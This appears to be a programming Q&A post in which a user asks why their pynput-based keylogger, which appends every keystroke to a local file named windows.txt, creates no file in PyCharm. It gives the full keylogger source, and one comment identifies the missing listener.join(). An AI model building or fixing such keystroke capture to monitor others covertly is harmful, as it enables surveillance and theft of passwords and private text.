# Unable to create text file pynput

Tags: python, pycharm, pynput

I am making a key logger which records every key strokes in a file named windows.txt. I am using pycharm IDE but it is not creating the .txt file. This code is working fine when I run it on Jupyter Notebook.

I also tried running it on VSCode but it didn't run on VSCode either.

```
# Import
from pynput import keyboard

# Decorate    
class text_decorator():

    def __init__(self, on_release):
        self.on_release = on_release

    def __call__(self, *args, **kwargs):
        self.on_release(*args, **kwargs)

    ####---------Replace Text---------####

    #read file and save it to a variable
        with open('windows.txt', 'r') as f:
            file_data = f.read()

        #replace the text
        file_data = file_data.replace('Key.space', ' ')
        file_data = file_data.replace('Key.enter', '\n')
        file_data = file_data.replace('Key.tab', '\t')
        file_data = file_data.replace("'", "")

        #write it again
        with open('windows.txt', 'w') as f:
            f.write(file_data)

@text_decorator
def on_release(key):
    f = open('windows.txt', 'a+')
    f.write(str(key))
    f.close()

listener = keyboard.Listener(on_release = on_release)
listener.start()
```

Error:
It just runs plainly without displaying no any errors or messages.

Comment: use `print()` to see if function `on_release` is executed. Besides VSCode and PyCharm are only tools to create code. if you have created program then you don't need IDE to use it. Nobody use IDE to run Excel or Chrome.

Comment: There is no join after listener.start().